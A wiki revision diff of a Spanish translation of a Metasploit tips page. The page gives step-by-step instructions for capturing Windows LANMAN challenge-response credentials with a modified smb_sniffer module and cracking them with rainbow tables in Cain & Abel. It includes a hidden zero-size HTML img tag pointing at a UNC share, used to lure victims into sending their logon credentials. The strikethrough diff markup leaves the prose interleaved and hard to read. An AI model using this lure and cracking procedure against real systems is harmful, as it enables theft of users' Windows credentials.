Revisión del 17:44 16 jul 2007 editar Seath (discusión \| contribs.) 39 ediciones m →‎LM Half-Challenge ← Edición anterior		Revisión del 22:45 16 jul 2007 editar deshacer Seath (discusión \| contribs.) 39 ediciones →‎LM Half-Challenge Edición siguiente →
Línea 63: == LM Half-Challenge == ~~Originally~~Originalmente ~~blogged~~publicada [http://grutztopia.jingojango.net/2007/04/ntlmv1-metasploit-and-you.html ~~here~~aquí] - ~~Using~~Usando ~~the~~las [http://www.freerainbowtables.com/index-rainbowtables-tables-halflmchall.html Free Rainbow Tables HALFLMCHALL Tables] ~~and~~y auna ~~modified~~versión ~~Metasploit~~modificada ~~2.7~~del ~~smb_sniffer~~modulo exploit ~~module~~smb_sniffer de Metasploit 2.7, ~~obtaining~~obtener ~~and~~y crackear ~~cracking~~los ~~LANMAN~~desafios ~~Challenges~~LM ~~has~~nunca ~~never~~fue ~~been~~tan ~~easier~~fácil. '''~~Step~~Paso 1.''' ~~Use~~Usar Metasploit 2.7 (~~for~~por ~~now~~ahora) ~~and~~y ~~the~~la ~~updated~~actualización del exploit [http://grutz.jingojango.net/exploits/smb_sniffer.pm smb_sniffer.pm] ~~exploit module~~. ~~This~~Este ~~does~~no ~~not~~funciona ~~work~~sobre onuna aplataforma Windows ~~platform~~. '''~~Step~~Paso 2.''' ~~Unpack~~Desempaquetar Msf2.7 ~~and~~y ~~place~~colocar smb_sniffer.pm ~~under~~en ~~the~~el ~~exploits/~~directorio ~~directory~~exploits, ~~replacing~~reemplazando ~~the~~la ~~older~~versión ~~version~~antigua. '''~~Step~~Paso 3.''' ~~Set~~Configura ~~up your~~tu Metasploit ~~and run~~y itejecutalo ascomo root <pre> Línea 113: </pre> '''~~Step~~Paso 4.''' ~~Have~~Hacer ~~somebody~~que ~~connect~~alguien tose ~~your~~conecte ~~server.~~a Ittu servidor. ~~can~~Puede beser astan simple ~~as a~~como "dir \\~~serverip~~ip_del_server\share" oro "<img src=\\~~serverip~~ip_del_server\share\file.gif height=0 width=0>" ~~tag~~en onuna ~~some~~página HTML ~~page~~. Windows ~~will~~procurará ~~attempt~~hacer tola ~~make~~conexión ~~the~~y ~~connection~~enviar ~~and~~las ~~send~~credenciales ~~the~~del ~~logged~~usuario inque ~~user~~se ~~credentials~~conecta a totu ~~your~~servidor ~~waiting~~que ~~server~~espera. [[Image:Metasploit-27-smbsniffer.png]] '''~~Step~~Paso 5.''' ~~Take~~Toma ~~your~~tu ~~new~~nuevo archivo pwtest.txt ~~file~~y ~~and~~copialo ~~copy~~a ituna ~~over~~máquina toque atenga Cain & ~~Able~~Abel ~~machine~~con ~~that~~las ~~has the~~tablas HALFLMCHALL ~~tables~~. [[Image:Metasploit-27-smbsniff-pw.png]] Línea 123: [[Image:Metasploit-27-cainadd.png]] '''~~Step~~Paso 6.''' ~~Select~~Selecciona ~~the~~el hash ~~you~~que ~~want~~quieres ~~to crack~~crackear, ~~right~~clic ~~click~~derecho ~~and~~y ~~select~~selecciona Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, ~~add~~añade ~~the~~las ~~tables,~~tablas ~~and~~y ~~crack~~listo! [[Image:Metasploit-27-cainsuccesshalflm.png]] '''~~Caveats~~Advertencias''' * ~~Only~~Solamente LANMAN hashes ~~can~~se bepuede ~~obtained~~obtener ~~this~~de ~~way~~esta manera. IfSi ~~the~~el ~~client~~cliente ~~denies~~deniega LM ~~then~~entonces ~~too~~no ~~bad~~funciona. * Solamente los primeros 7 caracteres están en las tablas. Tienes que usar fuerza bruta para el resto. * Only the first 7 characters are in the tables. You have to brute force the rest. * Las tablas en total son de 54 GB. Tomará un cierto tiempo para cargarlas en memoria y para buscar. * The tables are 54 GB total. It will take some time to load and search.

Diferencia entre revisiones de «Metasploit/TipsyTrucos»